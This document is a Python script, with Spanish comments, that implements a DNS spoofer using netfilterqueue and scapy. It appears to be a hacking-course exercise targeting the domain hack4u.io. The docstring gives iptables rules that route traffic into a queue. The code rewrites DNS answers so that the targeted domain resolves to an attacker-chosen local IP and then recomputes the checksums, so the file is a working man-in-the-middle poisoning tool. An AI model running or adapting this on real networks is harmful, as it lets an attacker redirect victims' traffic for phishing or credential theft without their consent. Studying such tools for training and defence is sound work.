89 lines
2.4 KiB
Python
89 lines
2.4 KiB
Python
# /usr/bin/env python3
|
|
"""
|
|
DNS Spoofer
|
|
|
|
Se necesita instalar netfilterqueue:
|
|
pip3 install netfilterqueue
|
|
|
|
Para que funcione hay que redirigir el tráfico a la cola 0:
|
|
iptables -I INPUT -j NFQUEUE --queue-num 0
|
|
iptables -I OUTPUT -j NFQUEUE --queue-num 0
|
|
iptables -I FORWARD -j NFQUEUE --queue-num 0
|
|
iptables --policy FORWARD ACCEPT
|
|
|
|
Con esto no puedes navegar porque los paquetes están a la espera
|
|
de ser procesados por netfilterqueue.
|
|
|
|
Para eliminar las anteriores reglas:
|
|
iptables -D INPUT -j NFQUEUE --queue-num 0
|
|
iptables -D OUTPUT -j NFQUEUE --queue-num 0
|
|
iptables -D FORWARD -j NFQUEUE --queue-num 0
|
|
iptables --policy FORWARD ACCEPT
|
|
|
|
"""
|
|
|
|
import netfilterqueue
|
|
import scapy.all as scapy
|
|
import signal
|
|
import sys
|
|
|
|
|
|
def def_handler(sig, frame):
|
|
|
|
print('\n[!] Saliendo...\n')
|
|
sys.exit(1)
|
|
|
|
|
|
signal.signal(signal.SIGINT, def_handler)
|
|
|
|
|
|
def process_packet(packet):
|
|
"""
|
|
Procesa los paquetes que llegan a la cola 0
|
|
"""
|
|
|
|
# El paquete en bruto lo tratamos como un paquete scapy para poder manipularlo
|
|
scapy_packet = scapy.IP(packet.get_payload())
|
|
|
|
# Filtramos los paquetes DNS por el puerto 53 y que tengan una capa DNSRR
|
|
if scapy_packet.haslayer(scapy.DNSRR):
|
|
|
|
# Obtenemos el nombre del dominio
|
|
qname = scapy_packet[scapy.DNSQR].qname
|
|
|
|
# Si el dominio es hack4u.io
|
|
if b"hack4u.io" in qname:
|
|
|
|
print(
|
|
f"\n[+] Envenenando los dominios hack4u.io ...\n"
|
|
)
|
|
|
|
# Creamos un paquete DNSRR con el nombre del dominio
|
|
# y la IP a la que queremos redirigir
|
|
answer = scapy.DNSRR(rrname=qname, rdata="192.168.1.115")
|
|
|
|
# Modificamos el paquete DNS original con la respuesta que queremos
|
|
scapy_packet[scapy.DNS].an = answer
|
|
# Ponemos el número de respuestas a 1
|
|
# (En este caso tenía 3 originalmente)
|
|
scapy_packet[scapy.DNS].ancount = 1
|
|
|
|
# Eliminamos los campos de longitud y checksum
|
|
# para que scapy los recalcule
|
|
del scapy_packet[scapy.IP].len
|
|
del scapy_packet[scapy.IP].chksum
|
|
del scapy_packet[scapy.UDP].len
|
|
del scapy_packet[scapy.UDP].chksum
|
|
|
|
packet.set_payload(scapy_packet.build())
|
|
|
|
packet.accept()
|
|
|
|
print(f"[+] Iniciando el envenenamiento de DNS ...")
|
|
|
|
queue = netfilterqueue.NetfilterQueue()
|
|
|
|
queue.bind(0, process_packet)
|
|
|
|
queue.run()
|